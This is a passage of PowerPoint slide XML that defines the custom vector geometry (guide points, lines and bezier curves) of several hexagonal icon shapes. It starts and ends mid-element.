                  <a:gd name="connsiteX15" fmla="*/ 158453 w 342900"/>
                  <a:gd name="connsiteY15" fmla="*/ 27146 h 380999"/>
                  <a:gd name="connsiteX16" fmla="*/ 36630 w 342900"/>
                  <a:gd name="connsiteY16" fmla="*/ 97555 h 380999"/>
                  <a:gd name="connsiteX17" fmla="*/ 34978 w 342900"/>
                  <a:gd name="connsiteY17" fmla="*/ 98593 h 380999"/>
                  <a:gd name="connsiteX18" fmla="*/ 79558 w 342900"/>
                  <a:gd name="connsiteY18" fmla="*/ 93202 h 380999"/>
                  <a:gd name="connsiteX19" fmla="*/ 79647 w 342900"/>
                  <a:gd name="connsiteY19" fmla="*/ 93202 h 380999"/>
                  <a:gd name="connsiteX20" fmla="*/ 79737 w 342900"/>
                  <a:gd name="connsiteY20" fmla="*/ 93202 h 380999"/>
                  <a:gd name="connsiteX21" fmla="*/ 138498 w 342900"/>
                  <a:gd name="connsiteY21" fmla="*/ 104061 h 380999"/>
                  <a:gd name="connsiteX22" fmla="*/ 138527 w 342900"/>
                  <a:gd name="connsiteY22" fmla="*/ 104070 h 380999"/>
                  <a:gd name="connsiteX23" fmla="*/ 152561 w 342900"/>
                  <a:gd name="connsiteY23" fmla="*/ 109080 h 380999"/>
                  <a:gd name="connsiteX24" fmla="*/ 134068 w 342900"/>
                  <a:gd name="connsiteY24" fmla="*/ 127597 h 380999"/>
                  <a:gd name="connsiteX25" fmla="*/ 130473 w 342900"/>
                  <a:gd name="connsiteY25" fmla="*/ 126311 h 380999"/>
                  <a:gd name="connsiteX26" fmla="*/ 108134 w 342900"/>
                  <a:gd name="connsiteY26" fmla="*/ 119996 h 380999"/>
                  <a:gd name="connsiteX27" fmla="*/ 76613 w 342900"/>
                  <a:gd name="connsiteY27" fmla="*/ 151543 h 380999"/>
                  <a:gd name="connsiteX28" fmla="*/ 59903 w 342900"/>
                  <a:gd name="connsiteY28" fmla="*/ 151543 h 380999"/>
                  <a:gd name="connsiteX29" fmla="*/ 59903 w 342900"/>
                  <a:gd name="connsiteY29" fmla="*/ 134817 h 380999"/>
                  <a:gd name="connsiteX30" fmla="*/ 77830 w 342900"/>
                  <a:gd name="connsiteY30" fmla="*/ 116872 h 380999"/>
                  <a:gd name="connsiteX31" fmla="*/ 23632 w 342900"/>
                  <a:gd name="connsiteY31" fmla="*/ 126216 h 380999"/>
                  <a:gd name="connsiteX32" fmla="*/ 23632 w 342900"/>
                  <a:gd name="connsiteY32" fmla="*/ 242249 h 380999"/>
                  <a:gd name="connsiteX33" fmla="*/ 70080 w 342900"/>
                  <a:gd name="connsiteY33" fmla="*/ 195748 h 380999"/>
                  <a:gd name="connsiteX34" fmla="*/ 86791 w 342900"/>
                  <a:gd name="connsiteY34" fmla="*/ 195748 h 380999"/>
                  <a:gd name="connsiteX35" fmla="*/ 86791 w 342900"/>
                  <a:gd name="connsiteY35" fmla="*/ 212474 h 380999"/>
                  <a:gd name="connsiteX36" fmla="*/ 27122 w 342900"/>
                  <a:gd name="connsiteY36" fmla="*/ 272206 h 380999"/>
                  <a:gd name="connsiteX37" fmla="*/ 26499 w 342900"/>
                  <a:gd name="connsiteY37" fmla="*/ 272786 h 380999"/>
                  <a:gd name="connsiteX38" fmla="*/ 36630 w 342900"/>
                  <a:gd name="connsiteY38" fmla="*/ 283445 h 380999"/>
                  <a:gd name="connsiteX39" fmla="*/ 124596 w 342900"/>
                  <a:gd name="connsiteY39" fmla="*/ 334289 h 380999"/>
                  <a:gd name="connsiteX40" fmla="*/ 125283 w 342900"/>
                  <a:gd name="connsiteY40" fmla="*/ 333537 h 380999"/>
                  <a:gd name="connsiteX41" fmla="*/ 161156 w 342900"/>
                  <a:gd name="connsiteY41" fmla="*/ 297628 h 380999"/>
                  <a:gd name="connsiteX42" fmla="*/ 177867 w 342900"/>
                  <a:gd name="connsiteY42" fmla="*/ 297628 h 380999"/>
                  <a:gd name="connsiteX43" fmla="*/ 177867 w 342900"/>
                  <a:gd name="connsiteY43" fmla="*/ 314354 h 380999"/>
                  <a:gd name="connsiteX44" fmla="*/ 145745 w 342900"/>
                  <a:gd name="connsiteY44" fmla="*/ 346510 h 380999"/>
                  <a:gd name="connsiteX45" fmla="*/ 158453 w 342900"/>
                  <a:gd name="connsiteY45" fmla="*/ 353854 h 380999"/>
                  <a:gd name="connsiteX46" fmla="*/ 184448 w 342900"/>
                  <a:gd name="connsiteY46" fmla="*/ 353854 h 380999"/>
                  <a:gd name="connsiteX47" fmla="*/ 306271 w 342900"/>
                  <a:gd name="connsiteY47" fmla="*/ 283445 h 380999"/>
                  <a:gd name="connsiteX48" fmla="*/ 319268 w 342900"/>
                  <a:gd name="connsiteY48" fmla="*/ 260909 h 380999"/>
                  <a:gd name="connsiteX49" fmla="*/ 319268 w 342900"/>
                  <a:gd name="connsiteY49" fmla="*/ 235677 h 380999"/>
                  <a:gd name="connsiteX50" fmla="*/ 271233 w 342900"/>
                  <a:gd name="connsiteY50" fmla="*/ 283759 h 380999"/>
                  <a:gd name="connsiteX51" fmla="*/ 254523 w 342900"/>
                  <a:gd name="connsiteY51" fmla="*/ 283759 h 380999"/>
                  <a:gd name="connsiteX52" fmla="*/ 254523 w 342900"/>
                  <a:gd name="connsiteY52" fmla="*/ 267033 h 380999"/>
                  <a:gd name="connsiteX53" fmla="*/ 319268 w 342900"/>
                  <a:gd name="connsiteY53" fmla="*/ 202216 h 380999"/>
                  <a:gd name="connsiteX54" fmla="*/ 319268 w 342900"/>
                  <a:gd name="connsiteY54" fmla="*/ 161268 h 380999"/>
                  <a:gd name="connsiteX55" fmla="*/ 282749 w 342900"/>
                  <a:gd name="connsiteY55" fmla="*/ 197825 h 380999"/>
                  <a:gd name="connsiteX56" fmla="*/ 266039 w 342900"/>
                  <a:gd name="connsiteY56" fmla="*/ 197825 h 380999"/>
                  <a:gd name="connsiteX57" fmla="*/ 266039 w 342900"/>
                  <a:gd name="connsiteY57" fmla="*/ 181099 h 380999"/>
                  <a:gd name="connsiteX58" fmla="*/ 284253 w 342900"/>
                  <a:gd name="connsiteY58" fmla="*/ 162868 h 380999"/>
                  <a:gd name="connsiteX59" fmla="*/ 270057 w 342900"/>
                  <a:gd name="connsiteY59" fmla="*/ 164163 h 380999"/>
                  <a:gd name="connsiteX60" fmla="*/ 270030 w 342900"/>
                  <a:gd name="connsiteY60" fmla="*/ 164163 h 380999"/>
                  <a:gd name="connsiteX61" fmla="*/ 207974 w 342900"/>
                  <a:gd name="connsiteY61" fmla="*/ 153981 h 380999"/>
                  <a:gd name="connsiteX62" fmla="*/ 226886 w 342900"/>
                  <a:gd name="connsiteY62" fmla="*/ 135045 h 380999"/>
                  <a:gd name="connsiteX63" fmla="*/ 269798 w 342900"/>
                  <a:gd name="connsiteY63" fmla="*/ 140513 h 380999"/>
                  <a:gd name="connsiteX64" fmla="*/ 314305 w 342900"/>
                  <a:gd name="connsiteY64" fmla="*/ 132779 h 380999"/>
                  <a:gd name="connsiteX65" fmla="*/ 319268 w 342900"/>
                  <a:gd name="connsiteY65" fmla="*/ 127816 h 380999"/>
                  <a:gd name="connsiteX66" fmla="*/ 319268 w 342900"/>
                  <a:gd name="connsiteY66" fmla="*/ 120091 h 380999"/>
                  <a:gd name="connsiteX67" fmla="*/ 306271 w 342900"/>
                  <a:gd name="connsiteY67" fmla="*/ 97555 h 380999"/>
                  <a:gd name="connsiteX68" fmla="*/ 184448 w 342900"/>
                  <a:gd name="connsiteY68" fmla="*/ 27146 h 380999"/>
                  <a:gd name="connsiteX69" fmla="*/ 158453 w 342900"/>
                  <a:gd name="connsiteY69" fmla="*/ 27146 h 380999"/>
                  <a:gd name="connsiteX70" fmla="*/ 171451 w 342900"/>
                  <a:gd name="connsiteY70" fmla="*/ 0 h 380999"/>
                  <a:gd name="connsiteX71" fmla="*/ 196264 w 342900"/>
                  <a:gd name="connsiteY71" fmla="*/ 6658 h 380999"/>
                  <a:gd name="connsiteX72" fmla="*/ 318086 w 342900"/>
                  <a:gd name="connsiteY72" fmla="*/ 77067 h 380999"/>
                  <a:gd name="connsiteX73" fmla="*/ 342900 w 342900"/>
                  <a:gd name="connsiteY73" fmla="*/ 120091 h 380999"/>
                  <a:gd name="connsiteX74" fmla="*/ 342900 w 342900"/>
                  <a:gd name="connsiteY74" fmla="*/ 260909 h 380999"/>
                  <a:gd name="connsiteX75" fmla="*/ 318086 w 342900"/>
                  <a:gd name="connsiteY75" fmla="*/ 303933 h 380999"/>
                  <a:gd name="connsiteX76" fmla="*/ 196264 w 342900"/>
                  <a:gd name="connsiteY76" fmla="*/ 374342 h 380999"/>
                  <a:gd name="connsiteX77" fmla="*/ 146636 w 342900"/>
                  <a:gd name="connsiteY77" fmla="*/ 374342 h 380999"/>
                  <a:gd name="connsiteX78" fmla="*/ 24814 w 342900"/>
                  <a:gd name="connsiteY78" fmla="*/ 303933 h 380999"/>
                  <a:gd name="connsiteX79" fmla="*/ 0 w 342900"/>
                  <a:gd name="connsiteY79" fmla="*/ 260909 h 380999"/>
                  <a:gd name="connsiteX80" fmla="*/ 0 w 342900"/>
                  <a:gd name="connsiteY80" fmla="*/ 120091 h 380999"/>
                  <a:gd name="connsiteX81" fmla="*/ 24814 w 342900"/>
                  <a:gd name="connsiteY81" fmla="*/ 77067 h 380999"/>
                  <a:gd name="connsiteX82" fmla="*/ 146636 w 342900"/>
                  <a:gd name="connsiteY82" fmla="*/ 6658 h 380999"/>
                  <a:gd name="connsiteX83" fmla="*/ 171451 w 342900"/>
                  <a:gd name="connsiteY83" fmla="*/ 0 h 3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42900" h="380999">
                    <a:moveTo>
                      <a:pt x="206936" y="103175"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="211690" y="107652"/>
                      <a:pt x="211919" y="115139"/>
                      <a:pt x="207449" y="119901"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="157440" y="173136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215157" y="173136"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="219951" y="173136"/>
                      <a:pt x="224269" y="176032"/>
                      <a:pt x="226089" y="180470"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="227908" y="184919"/>
                      <a:pt x="226867" y="190014"/>
                      <a:pt x="223453" y="193386"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="138439" y="277311"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="133793" y="281902"/>
                      <a:pt x="126312" y="281845"/>
                      <a:pt x="121730" y="277197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117147" y="272539"/>
                      <a:pt x="117200" y="265052"/>
                      <a:pt x="121846" y="260471"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="186346" y="196796"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130108" y="196796"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="125395" y="196796"/>
                      <a:pt x="121133" y="193986"/>
                      <a:pt x="119263" y="189662"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117392" y="185328"/>
                      <a:pt x="118271" y="180299"/>
                      <a:pt x="121500" y="176860"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="190234" y="103690"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="194704" y="98927"/>
                      <a:pt x="202182" y="98698"/>
                      <a:pt x="206936" y="103175"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="158453" y="27146"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="36630" y="97555"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="36064" y="97879"/>
                      <a:pt x="35513" y="98231"/>
                      <a:pt x="34978" y="98593"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50760" y="95002"/>
                      <a:pt x="66515" y="93202"/>
                      <a:pt x="79558" y="93202"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="79647" y="93202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79737" y="93202"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="99674" y="93507"/>
                      <a:pt x="119402" y="97136"/>
                      <a:pt x="138498" y="104061"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="138527" y="104070"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152561" y="109080"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134068" y="127597"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130473" y="126311"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="123110" y="123634"/>
                      <a:pt x="115654" y="121530"/>
                      <a:pt x="108134" y="119996"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="76613" y="151543"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="71999" y="156162"/>
                      <a:pt x="64518" y="156162"/>
                      <a:pt x="59903" y="151543"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55289" y="146923"/>
                      <a:pt x="55289" y="139436"/>
                      <a:pt x="59903" y="134817"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="77830" y="116872"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="62373" y="117091"/>
                      <a:pt x="42145" y="120186"/>
                      <a:pt x="23632" y="126216"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="23632" y="242249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70080" y="195748"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="74695" y="191129"/>
                      <a:pt x="82176" y="191129"/>
                      <a:pt x="86791" y="195748"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91405" y="200368"/>
                      <a:pt x="91405" y="207855"/>
                      <a:pt x="86791" y="212474"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="27122" y="272206"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="26920" y="272415"/>
                      <a:pt x="26712" y="272606"/>
                      <a:pt x="26499" y="272786"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28745" y="277168"/>
                      <a:pt x="32224" y="280902"/>
                      <a:pt x="36630" y="283445"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="124596" y="334289"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="124812" y="334032"/>
                      <a:pt x="125041" y="333785"/>
                      <a:pt x="125283" y="333537"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="161156" y="297628"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="165770" y="293008"/>
                      <a:pt x="173252" y="293008"/>
                      <a:pt x="177867" y="297628"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="182481" y="302247"/>
                      <a:pt x="182481" y="309734"/>
                      <a:pt x="177867" y="314354"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="145745" y="346510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158453" y="353854"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="166496" y="358502"/>
                      <a:pt x="176405" y="358502"/>
                      <a:pt x="184448" y="353854"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="306271" y="283445"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="314314" y="278797"/>
                      <a:pt x="319268" y="270205"/>
                      <a:pt x="319268" y="260909"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="319268" y="235677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271233" y="283759"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="266619" y="288379"/>
                      <a:pt x="259137" y="288379"/>
                      <a:pt x="254523" y="283759"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="249908" y="279140"/>
                      <a:pt x="249908" y="271653"/>
                      <a:pt x="254523" y="267033"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="319268" y="202216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319268" y="161268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282749" y="197825"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="278135" y="202444"/>
                      <a:pt x="270653" y="202444"/>
                      <a:pt x="266039" y="197825"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="261424" y="193205"/>
                      <a:pt x="261424" y="185719"/>
                      <a:pt x="266039" y="181099"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="284253" y="162868"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="278861" y="163639"/>
                      <a:pt x="273977" y="164125"/>
                      <a:pt x="270057" y="164163"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="270030" y="164163"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="248997" y="164363"/>
                      <a:pt x="227989" y="160896"/>
                      <a:pt x="207974" y="153981"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="226886" y="135045"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="240925" y="138798"/>
                      <a:pt x="255369" y="140646"/>
                      <a:pt x="269798" y="140513"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="278908" y="140398"/>
                      <a:pt x="297453" y="136788"/>
                      <a:pt x="314305" y="132779"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="319268" y="127816"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319268" y="120091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="319268" y="110795"/>
                      <a:pt x="314314" y="102203"/>
                      <a:pt x="306271" y="97555"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="184448" y="27146"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="176405" y="22498"/>
                      <a:pt x="166496" y="22498"/>
                      <a:pt x="158453" y="27146"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="171451" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="180019" y="0"/>
                      <a:pt x="188587" y="2219"/>
                      <a:pt x="196264" y="6658"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="318086" y="77067"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="333442" y="85944"/>
                      <a:pt x="342900" y="102346"/>
                      <a:pt x="342900" y="120091"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="342900" y="260909"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="342900" y="278663"/>
                      <a:pt x="333442" y="295065"/>
                      <a:pt x="318086" y="303933"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="196264" y="374342"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="180909" y="383219"/>
                      <a:pt x="161992" y="383219"/>
                      <a:pt x="146636" y="374342"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24814" y="303933"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9459" y="295065"/>
                      <a:pt x="0" y="278663"/>
                      <a:pt x="0" y="260909"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="120091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="102346"/>
                      <a:pt x="9459" y="85944"/>
                      <a:pt x="24814" y="77067"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="146636" y="6658"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="154314" y="2219"/>
                      <a:pt x="162882" y="0"/>
                      <a:pt x="171451" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:grp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28AC2826-ED7F-4DF7-CFBA-35492AFF7222}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9289971" y="4836117"/>
                <a:ext cx="971576" cy="1079532"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 196264 w 342899"/>
                  <a:gd name="connsiteY0" fmla="*/ 6658 h 381000"/>
                  <a:gd name="connsiteX1" fmla="*/ 146636 w 342899"/>
                  <a:gd name="connsiteY1" fmla="*/ 6658 h 381000"/>
                  <a:gd name="connsiteX2" fmla="*/ 24814 w 342899"/>
                  <a:gd name="connsiteY2" fmla="*/ 77067 h 381000"/>
                  <a:gd name="connsiteX3" fmla="*/ 0 w 342899"/>
                  <a:gd name="connsiteY3" fmla="*/ 120091 h 381000"/>
                  <a:gd name="connsiteX4" fmla="*/ 0 w 342899"/>
                  <a:gd name="connsiteY4" fmla="*/ 260909 h 381000"/>
                  <a:gd name="connsiteX5" fmla="*/ 24814 w 342899"/>
                  <a:gd name="connsiteY5" fmla="*/ 303933 h 381000"/>
                  <a:gd name="connsiteX6" fmla="*/ 146636 w 342899"/>
                  <a:gd name="connsiteY6" fmla="*/ 374342 h 381000"/>
                  <a:gd name="connsiteX7" fmla="*/ 196264 w 342899"/>
                  <a:gd name="connsiteY7" fmla="*/ 374342 h 381000"/>
                  <a:gd name="connsiteX8" fmla="*/ 318086 w 342899"/>
                  <a:gd name="connsiteY8" fmla="*/ 303933 h 381000"/>
                  <a:gd name="connsiteX9" fmla="*/ 342900 w 342899"/>
                  <a:gd name="connsiteY9" fmla="*/ 260909 h 381000"/>
                  <a:gd name="connsiteX10" fmla="*/ 342900 w 342899"/>
                  <a:gd name="connsiteY10" fmla="*/ 120091 h 381000"/>
                  <a:gd name="connsiteX11" fmla="*/ 318086 w 342899"/>
                  <a:gd name="connsiteY11" fmla="*/ 77067 h 381000"/>
                  <a:gd name="connsiteX12" fmla="*/ 196264 w 342899"/>
                  <a:gd name="connsiteY12" fmla="*/ 6658 h 381000"/>
                  <a:gd name="connsiteX13" fmla="*/ 158453 w 342899"/>
                  <a:gd name="connsiteY13" fmla="*/ 27146 h 381000"/>
                  <a:gd name="connsiteX14" fmla="*/ 184448 w 342899"/>
                  <a:gd name="connsiteY14" fmla="*/ 27146 h 381000"/>
                  <a:gd name="connsiteX15" fmla="*/ 306271 w 342899"/>
                  <a:gd name="connsiteY15" fmla="*/ 97555 h 381000"/>
                  <a:gd name="connsiteX16" fmla="*/ 319268 w 342899"/>
                  <a:gd name="connsiteY16" fmla="*/ 120091 h 381000"/>
                  <a:gd name="connsiteX17" fmla="*/ 319268 w 342899"/>
                  <a:gd name="connsiteY17" fmla="*/ 127216 h 381000"/>
                  <a:gd name="connsiteX18" fmla="*/ 319046 w 342899"/>
                  <a:gd name="connsiteY18" fmla="*/ 127044 h 381000"/>
                  <a:gd name="connsiteX19" fmla="*/ 314937 w 342899"/>
                  <a:gd name="connsiteY19" fmla="*/ 123882 h 381000"/>
                  <a:gd name="connsiteX20" fmla="*/ 282757 w 342899"/>
                  <a:gd name="connsiteY20" fmla="*/ 112462 h 381000"/>
                  <a:gd name="connsiteX21" fmla="*/ 248683 w 342899"/>
                  <a:gd name="connsiteY21" fmla="*/ 125301 h 381000"/>
                  <a:gd name="connsiteX22" fmla="*/ 248342 w 342899"/>
                  <a:gd name="connsiteY22" fmla="*/ 125549 h 381000"/>
                  <a:gd name="connsiteX23" fmla="*/ 226961 w 342899"/>
                  <a:gd name="connsiteY23" fmla="*/ 133922 h 381000"/>
                  <a:gd name="connsiteX24" fmla="*/ 206292 w 342899"/>
                  <a:gd name="connsiteY24" fmla="*/ 125759 h 381000"/>
                  <a:gd name="connsiteX25" fmla="*/ 206015 w 342899"/>
                  <a:gd name="connsiteY25" fmla="*/ 125549 h 381000"/>
                  <a:gd name="connsiteX26" fmla="*/ 171148 w 342899"/>
                  <a:gd name="connsiteY26" fmla="*/ 112452 h 381000"/>
                  <a:gd name="connsiteX27" fmla="*/ 135736 w 342899"/>
                  <a:gd name="connsiteY27" fmla="*/ 125349 h 381000"/>
                  <a:gd name="connsiteX28" fmla="*/ 115134 w 342899"/>
                  <a:gd name="connsiteY28" fmla="*/ 133922 h 381000"/>
                  <a:gd name="connsiteX29" fmla="*/ 93512 w 342899"/>
                  <a:gd name="connsiteY29" fmla="*/ 125397 h 381000"/>
                  <a:gd name="connsiteX30" fmla="*/ 92915 w 342899"/>
                  <a:gd name="connsiteY30" fmla="*/ 124968 h 381000"/>
                  <a:gd name="connsiteX31" fmla="*/ 59120 w 342899"/>
                  <a:gd name="connsiteY31" fmla="*/ 112452 h 381000"/>
                  <a:gd name="connsiteX32" fmla="*/ 26769 w 342899"/>
                  <a:gd name="connsiteY32" fmla="*/ 124492 h 381000"/>
                  <a:gd name="connsiteX33" fmla="*/ 23632 w 342899"/>
                  <a:gd name="connsiteY33" fmla="*/ 127035 h 381000"/>
                  <a:gd name="connsiteX34" fmla="*/ 23632 w 342899"/>
                  <a:gd name="connsiteY34" fmla="*/ 120091 h 381000"/>
                  <a:gd name="connsiteX35" fmla="*/ 36630 w 342899"/>
                  <a:gd name="connsiteY35" fmla="*/ 97555 h 381000"/>
                  <a:gd name="connsiteX36" fmla="*/ 158453 w 342899"/>
                  <a:gd name="connsiteY36" fmla="*/ 27146 h 381000"/>
                  <a:gd name="connsiteX37" fmla="*/ 23632 w 342899"/>
                  <a:gd name="connsiteY37" fmla="*/ 155534 h 381000"/>
                  <a:gd name="connsiteX38" fmla="*/ 23632 w 342899"/>
                  <a:gd name="connsiteY38" fmla="*/ 188538 h 381000"/>
                  <a:gd name="connsiteX39" fmla="*/ 26769 w 342899"/>
                  <a:gd name="connsiteY39" fmla="*/ 185995 h 381000"/>
                  <a:gd name="connsiteX40" fmla="*/ 59120 w 342899"/>
                  <a:gd name="connsiteY40" fmla="*/ 173965 h 381000"/>
                  <a:gd name="connsiteX41" fmla="*/ 92915 w 342899"/>
                  <a:gd name="connsiteY41" fmla="*/ 186481 h 381000"/>
                  <a:gd name="connsiteX42" fmla="*/ 93512 w 342899"/>
                  <a:gd name="connsiteY42" fmla="*/ 186909 h 381000"/>
                  <a:gd name="connsiteX43" fmla="*/ 115134 w 342899"/>
                  <a:gd name="connsiteY43" fmla="*/ 195424 h 381000"/>
                  <a:gd name="connsiteX44" fmla="*/ 135736 w 342899"/>
                  <a:gd name="connsiteY44" fmla="*/ 186861 h 381000"/>
                  <a:gd name="connsiteX45" fmla="*/ 171148 w 342899"/>
                  <a:gd name="connsiteY45" fmla="*/ 173965 h 381000"/>
                  <a:gd name="connsiteX46" fmla="*/ 206015 w 342899"/>
                  <a:gd name="connsiteY46" fmla="*/ 187061 h 381000"/>
                  <a:gd name="connsiteX47" fmla="*/ 206292 w 342899"/>
                  <a:gd name="connsiteY47" fmla="*/ 187271 h 381000"/>
                  <a:gd name="connsiteX48" fmla="*/ 226961 w 342899"/>
                  <a:gd name="connsiteY48" fmla="*/ 195434 h 381000"/>
                  <a:gd name="connsiteX49" fmla="*/ 248342 w 342899"/>
                  <a:gd name="connsiteY49" fmla="*/ 187061 h 381000"/>
                  <a:gd name="connsiteX50" fmla="*/ 248683 w 342899"/>
                  <a:gd name="connsiteY50" fmla="*/ 186814 h 381000"/>
                  <a:gd name="connsiteX51" fmla="*/ 282757 w 342899"/>
                  <a:gd name="connsiteY51" fmla="*/ 173965 h 381000"/>
                  <a:gd name="connsiteX52" fmla="*/ 314937 w 342899"/>
                  <a:gd name="connsiteY52" fmla="*/ 185395 h 381000"/>
                  <a:gd name="connsiteX53" fmla="*/ 319045 w 342899"/>
                  <a:gd name="connsiteY53" fmla="*/ 188547 h 381000"/>
                  <a:gd name="connsiteX54" fmla="*/ 319268 w 342899"/>
                  <a:gd name="connsiteY54" fmla="*/ 188719 h 381000"/>
                  <a:gd name="connsiteX55" fmla="*/ 319268 w 342899"/>
                  <a:gd name="connsiteY55" fmla="*/ 155391 h 381000"/>
                  <a:gd name="connsiteX56" fmla="*/ 303462 w 342899"/>
                  <a:gd name="connsiteY56" fmla="*/ 144913 h 381000"/>
                  <a:gd name="connsiteX57" fmla="*/ 300709 w 342899"/>
                  <a:gd name="connsiteY57" fmla="*/ 142770 h 381000"/>
                  <a:gd name="connsiteX58" fmla="*/ 283594 w 342899"/>
                  <a:gd name="connsiteY58" fmla="*/ 136103 h 381000"/>
                  <a:gd name="connsiteX59" fmla="*/ 262005 w 342899"/>
                  <a:gd name="connsiteY59" fmla="*/ 144847 h 381000"/>
                  <a:gd name="connsiteX60" fmla="*/ 261976 w 342899"/>
                  <a:gd name="connsiteY60" fmla="*/ 144875 h 381000"/>
                  <a:gd name="connsiteX61" fmla="*/ 227364 w 342899"/>
                  <a:gd name="connsiteY61" fmla="*/ 157572 h 381000"/>
                  <a:gd name="connsiteX62" fmla="*/ 192042 w 342899"/>
                  <a:gd name="connsiteY62" fmla="*/ 144637 h 381000"/>
                  <a:gd name="connsiteX63" fmla="*/ 192020 w 342899"/>
